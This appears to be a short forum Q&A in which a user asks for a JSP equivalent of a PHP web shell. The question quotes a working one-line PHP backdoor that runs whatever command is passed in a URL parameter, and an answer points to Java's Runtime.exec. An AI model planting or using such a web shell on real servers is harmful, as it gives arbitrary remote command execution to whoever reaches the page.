# JSP equivalent for PHP code

Tags: php, jsp

I am new to JSP, all I need to do is get interactive command shell on it for a module.

For PHP, I would generally do

```
 <?php echo system($_GET["cmd"]); exit; ?>
```

to get command shell.

Is there some sort of equivalent code for JSP ? I couldn't find a short and easy way to do that.

This one looks too long http://www.eflip.com/jspservlet/ExecutingCmd.htm for seemingly simple job.

Comment: How about also adding a constructive comment along with down-voting? :)

Answer (score 0):

```
Runtime.getRuntime().exec(<your command>)
```

Comment: how do you get CMD through this? I mean please have a look at the code I mentioned in PHP, I am getting interactive command shell.

Comment: I do not understand what you need: system in php is equivalent to this command . To get the output just use the method in the link you mention. Also remember that system of php returns only the last line